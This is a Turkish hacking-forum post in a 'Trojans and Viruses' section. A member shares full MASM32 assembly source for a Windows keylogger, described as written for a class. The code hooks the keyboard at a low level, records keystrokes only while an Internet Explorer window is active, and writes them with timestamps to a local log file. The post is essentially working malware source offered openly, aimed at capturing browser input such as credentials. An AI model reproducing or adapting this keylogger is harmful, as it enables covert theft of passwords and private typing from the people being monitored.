Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Trojan ve Virüsler

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.





balık yemek değil balık tutmak

Trojan ve Virüsler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 10-05-2012 19:41   #1
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
12/2010
Nereden
ADANA
Yaş
27
Mesajlar
Konular

Teşekkür (Etti): 145
Teşekkür (Aldı): 39


balık yemek değil balık tutmak



işte masm32 ortamında yazılmış bir local keylogger örneği. bizzat microlab dersinde yazdık. el emeği göz nuru

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

KBDLLHOOKSTRUCT STRUCT

vkCode DWORD ?
scanCode DWORD ?
dwFlags DWORD ?
time DWORD ?
dwExtraInfo DWORD ?

KBDLLHOOKSTRUCT ENDS

keybproc PROTO DWORD, DWORD, DWORD

.data

file HANDLE 0
buffer_offset DWORD 0
caps_lock_on BOOL 0
shift BOOL 0
caps BOOL 0

.const

class_name db "kLogger", 0
log_file db "key.log", 0
logger_started db "Logger started ", 0
logger_stopped db 13, 10, "Logger stopped ", 0
format_time db "%02d.%02d.%d %02d:%02d (UTC)" ,13,10,0
error db "Error",0
ie_title db "Internet Explorer",0



.data?
buffer db 32 dup(?)
hinst HINSTANCE ?
written DWORD ?
ghwnd HWND ?




.code
start:
invoke GetModuleHandle,NULL
mov hinst,eax
call main
invoke ExitProcess,eax


main proc
LOCAL wc:WNDCLASSEX
LOCAL hook:HHOOK
LOCAL msg:MSG

invoke CreateFile, addr log_file,GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov file,eax
.IF(eax== INVALID_HANDLE_VALUE)
invoke MessageBox, NULL, addr error, addr error, MB_OK
ret
.ENDIF
invoke GetLastError
.IF (eax==ERROR_ALREADY_EXISTS)
invoke SetFilePointer,file,0,NULL,FILE_END
.ENDIF

invoke WriteFile,file,addr logger_started,15, addr written,NULL
call time2log

mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc,offset main_wnd
mov wc.cbClsExtra, NULL
mov wc.cbWndExtra, WS_EX_CONTROLPARENT
push hinst
pop wc.hInstance
mov wc.hbrBackground, COLOR_BTNFACE+1
mov wc.lpszMenuName, NULL
mov wc.lpszClassName,offset class_name
mov wc.hIcon,NULL
mov wc.hIconSm,NULL
mov wc.hCursor,NULL
invoke RegisterClassEx,addr wc


.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIF


invoke CreateWindowEx, NULL, addr class_name, NULL, 0, 0, 0, 0, 0, NULL, NULL, hinst, NULL

.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIF



mov ghwnd, eax
invoke GetKeyState, VK_CAPITAL

.IF(eax)

mov caps, 1
.ENDIF


invoke SetWindowsHookEx, WH_KEYBOARD_LL, addr keybproc, hinst, NULL
mov hook, eax


.WHILE TRUE
invoke GetMessage, addr msg, NULL, 0,0
.BREAK .IF(!eax)
invoke TranslateMessage, addr msg
invoke DispatchMessage, addr msg

.ENDW



invoke UnhookWindowsHookEx, hook
call flush_buffer
invoke WriteFile, file, addr logger_stopped, 17, addr written, NULL
call time2log

invoke CloseHandle, file


mov eax,msg.wParam
ret


main endp




main_wnd proc hwnd:HWND, msg:UINT, wparam:WPARAM, lparam:LPARAM

.IF(msg==WM_CLOSE)
invoke PostQuitMessage, NULL
.ELSE

invoke DefWindowProc, hwnd, msg, wparam, lparam
ret
.ENDIF


xor eax,eax
ret
main_wnd endp



ie_active proc

local hwnd: HWND
local text[256]: BYTE
local i: UINT
local j: UINT


call GetForegroundWindow
mov hwnd, eax

invoke GetWindowText, hwnd, addr text, SIZEOF text
mov i, eax
mov j,0

.WHILE(i)

mov ebx, j
invoke lstrcmpi, addr text[ebx], addr ie_title
.IF(!eax)

mov eax, 1
ret
.ENDIF
dec i
inc j
.ENDW


xor eax, eax
ret

ie_active endp









keybproc proc code DWORD, wparam:WPARAM, lparam: LPARAM

call ie_active
.IF (eax && (code == HC_ACTION))
mov ebx, lparam
assume ebxtr KBDLLHOOKSTRUCT
mov edx, [ebx].vkCode
.IF (wparam ==WM_KEYDOWN)
; if user hits f10 , we shut down
.IF (edx == VK_F10)
invoke PostMessage, ghwnd, WM_CLOSE, NULL, NULL
ret
.ENDIF

; keep track of shift and capslock

.IF (edx == VK_LSHIFT || edx ==VK_RSHIFT)
mov shift, 1
.ELSEIF (edx == VK_CAPITAL)
.IF (!caps_lock_on)
; toggle caps true/ false
xor caps, 1
mov caps_lock_on, 1
.ENDIF
.ELSE
;write to file if buffer might overflow
.IF (buffer_offset >=32-16)
call flush_buffer
.ENDIF

mov ecx, buffer_offset

.IF (edx == VK_SPACE|| edx == VK_RETURN || edx == VK_TAB)
mov buffer[ecx], dl
inc ecx
.ELSEIF (!shift && (edx>2Fh && edx < 3Ah))
; 0..9
mov buffer[ecx], dl
inc ecx
.ELSEIF (edx > 40h && edx < 5Bh)
mov eax, shift
xor eax , caps
.IF (!eax)
or edx, 20h
.ENDIF

mov buffer[ecx], dl
inc ecx
.ELSE

mov buffer[ecx], '['
inc ecx
.IF (shift)
mov buffer[ecx], '!'
inc ecx
.ENDIF

push ecx
mov eax , 32-1
sub eax, ecx
push eax
lea eax, buffer[ecx]
push eax
mov edx, [ebx].scanCode
mov eax, [ebx].dwFlags
shl edx , 16
shl eax , 24
or edx, eax
push edx
call GetKeyNameText
pop ecx
add ecx, eax
mov buffer[ecx], ']'
inc ecx
.ENDIF
mov buffer_offset, ecx
.ENDIF
.ELSEIF (wparam== WM_KEYUP)
.IF (edx == VK_LSHIFT || edx == VK_RSHIFT)
mov shift, 0
.ELSE
mov caps_lock_on, 0
.ENDIF
.ENDIF

assume ebx: nothing
.ENDIF

invoke CallNextHookEx , NULL, code, wparam, lparam

ret
keybproc endp
time2log proc
LOCAL SysTime:SYSTEMTIME
LOCAL output[32]:BYTE

;Get current date/time
invoke GetSystemTime,addr SysTime
lea ebx,SysTime
assume ebxtr SYSTEMTIME
xor eax,eax
mov ax,[ebx].wSecond
push eax
mov ax,[ebx].wMinute
push eax
mov ax,[ebx].wHour
push eax
mov ax,[ebx].wYear
push eax
mov ax,[ebx].wMonth
push eax
mov ax,[ebx].wDay
push eax
assume ebx:nothing
push offset format_time
lea eax,output
push eax
call wsprintf

;Write it to the log file
invoke WriteFile, file,addr output, eax, addr written, NULL
ret

time2log endp

flush_buffer proc
;Write buffered data to log file
.IF (buffer_offset!=0)
invoke WriteFile,file,addr buffer, buffer_offset,addr written,NULL

mov buffer_offset,0
.ENDIF
ret
flush_buffer endp
end start



___________________________________________

Raspberry Pi, Arduino, UAV, Autopilot, Flight Controller, C, C++, C#, Windows Phone 8 ,Asp.net, Aforge.net framework ,Openlayers, Entity Framework, eBA süreç yönetimi, Oracle, Mssql, ödevler, projeler...


Konu WOLSİN tarafından (10-05-2012 19:48 Saat 19:48 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau